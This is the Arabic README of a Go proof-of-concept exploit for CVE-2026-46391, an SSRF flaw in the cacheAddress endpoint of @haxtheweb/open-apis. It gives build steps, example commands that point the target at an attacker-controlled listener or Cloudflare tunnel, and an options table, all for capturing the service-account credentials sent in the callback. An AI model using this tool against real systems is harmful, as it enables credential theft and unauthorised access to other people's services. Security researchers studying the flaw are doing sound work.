
استغلال إثبات المفهوم لـ CVE-2026-46391
إثبات مفهوم لـ CVE-2026-46391. يُطلق ثغرة SSRF في نقطة النهاية cacheAddress الخاصة بـ @haxtheweb/open-apis ويلتقط بيانات اعتماد حساب الخدمة المرسلة في رد الاتصال.

go build -o cve-2026-46391 .
go test ./...
./cve-2026-46391 -u <web-root> -l <listener> [-p port] [-t seconds] [-v]
مباشر (على نفس شبكة الهدف):
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201
عبر VPS/نفق Cloudflare/إلخ:
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com
منفذ ومهلة مخصصان:
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
| الخيار | الوصف | الافتراضي |
|---|
-u, --url | جذر الويب المستهدف (مثل http://10.10.0.80:3000) | مطلوب |
-l, --listener | عنوان IP/اسم المضيف الخاص بك أو عنوان النفق (مثل 192.168.1.10، https://uuid.trycloudflare.com) | مطلوب |
-p, --port | المنفذ المحلي الذي سيتم الاستماع عليه | 8080 |
-t, --timeout | الثواني التي يتم انتظار رد الاتصال خلالها | 30 |
-v, --verbose | طباعة الترويسات ومحتوى كل طلب وارد | معطّل |